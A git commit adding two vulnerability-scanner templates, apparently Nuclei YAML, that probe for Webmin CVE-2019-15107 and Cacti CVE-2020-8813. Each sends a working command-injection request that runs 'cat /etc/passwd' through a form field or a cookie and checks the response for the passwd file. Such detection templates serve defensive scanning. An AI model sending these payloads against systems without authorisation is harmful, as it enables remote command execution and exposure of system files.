added cve-2019-15107

2020-09-25 09:20:52 -03:00 · 2020-09-25 09:20:52 -03:00 · bee3e3839e
parent 114f83abc4
commit bee3e3839e
2 changed files with 64 additions and 0 deletions
--- a/cves/CVE-2019-15107.yaml
+++ b/cves/CVE-2019-15107.yaml
@ -0,0 +1,32 @@
+id: cve-2019-15107
+
+info:
+  name: Webmin <= 1.920 Unauhenticated Remote Command Execution
+  author: bp0lr
+  severity: high
+
+# Refrence:-https://www.exploit-db.com/exploits/47293
+# Refrence:-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
+
+requests:
+  - raw:  #
+      - |
+        POST /password_change.cgi HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Referer: https://{{Hostname}}/
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 73
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+
+        user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
--- a/cves/CVE-2020-8813.yaml
+++ b/cves/CVE-2020-8813.yaml
@ -0,0 +1,32 @@
+id: cve-2020-8813
+
+info:
+  name: CVE-2020-8813
+  author: bp0lr
+  severity: high
+  description: graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
+
+  # Reference to exploit
+  # https://www.exploit-db.com/exploits/48159
+
+requests:
+  - raw:
+      - |
+        GET /graph_realtime.php?action=init HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Cookie: cacti=;cat${IFS}/etc/passwd;
+
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body